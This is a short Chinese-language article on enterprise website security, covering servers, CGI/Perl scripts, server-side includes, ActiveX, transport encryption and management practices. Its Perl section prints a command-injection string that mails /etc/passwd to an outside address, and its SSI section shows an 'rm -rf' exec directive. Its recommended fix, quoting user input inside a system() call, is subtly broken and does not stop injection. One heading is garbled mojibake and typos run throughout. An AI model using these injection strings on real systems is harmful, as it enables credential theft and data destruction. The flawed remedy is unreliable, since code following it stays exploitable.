企业网站的安全防护的几条方案

这里要考虑几方面的安全问题：操作系统平台的安全性，Web服务器的安全性，Web应用
程序的安全性，信息传输过程的安全性，管理上的安全性。

操作系统的安全性：

虽然没有一种网络操作系统是绝对安全的，但UNIX经过几十年来的发展已相当成熟，以
其稳定性和安全性成为关键性应用的首选。而Windows NT以其易用性、应用程序多种多样和
性能的不断改进，在中小型企业中得到广泛的应用。

Web服务器的安全性：

目前流行的三大Web Server都有自身的安全加密的产品或插件，支持SSL。

Webτ贸绦虻陌踩浴?br>
Web应用程序安全性主要是指CGI程序的安全性和开发脚本语言自身的安全性。
CGI使Web服务器能够将信息传至Web客户端，几乎所有程序都可以达成个过程。
一个CGI程序的安全性依耐于系统配置。
PERL安全Perl本身是安全的。但在程序设计中，一些调用涉及服务器服务的命令，就该
特别注意。
例如：System("grep $user_input /home/programmer/my_database")
类似的系统调用时不安全的，因为不能预料用户打算干什么。破译者会输入以附加命令
为目的的字符串。
如果服务器没有过滤提交字符串的机制，破译者久可以利用跟后的字符串将附加的命令
送如参数表，例如：
user_string;mail ad@asd.com/etc/passwd>
解决方法：
System("grep\"$User_input\"/home/programmer/my_database")
文件产生
如果CGI程序产生文件，必须遵循下述原则：

1. 限制文件产生的目录：其目录应从任何与系统相关的部分独立开来，。放在容易识别、
管理和清除的地方。
2. 尽可能限制文件的操作属性：当一个文件属于某个人才有权操作时，应限制下属进程往
文件写信息。
3. 确认文件名字不待跟后字符。

服务器端的include（主要是指Unix服务器）服务器端include通过从本地硬盘驱动器中
调用文档或其他对象，然后将这些元素自动包含在Web页面中。
例如：#exec cmd="rm -rf"à这个看起来象SSI,假如这条SSI成功执行且HTTPD正在根下
运行，则删除的什整个驱动器。大多数站点禁止使用SSI.

ActiveX

Microsoft公司得Active技术提供了非常多的服务器-客户机功能。但它也造成了很大的
Internet的安全威胁。
Active可以执行二进制代码，所以可以使用Active编写恶意代码，移动或更改用户本地
硬盘的文件或不让用户
知道就来联结到其他计算机上。如果一段Active程序能伪装成特殊的应用，它就能进行
"远程控制"。

信息传输过程的安全性

企业在更新站点时，会用到传输工具和远端服务器打交道。在Internet传输文件是很有
可能被监听的。
所以对于一些企业的敏感数据，一定要在传输过程中加密。

管理上的安全性。

即便是软件上做得无懈可击了，在安全管理上做不好，依然能引起很多的安全问题。企
业对重要数据要定期的备份。对敏感数据要重点保护加密处理。建立安全管理机制。制定安
全措施。

随着Internet的发展，更多的信息会发布到网络上来。希望本文有些可供企业用户参考的地地方。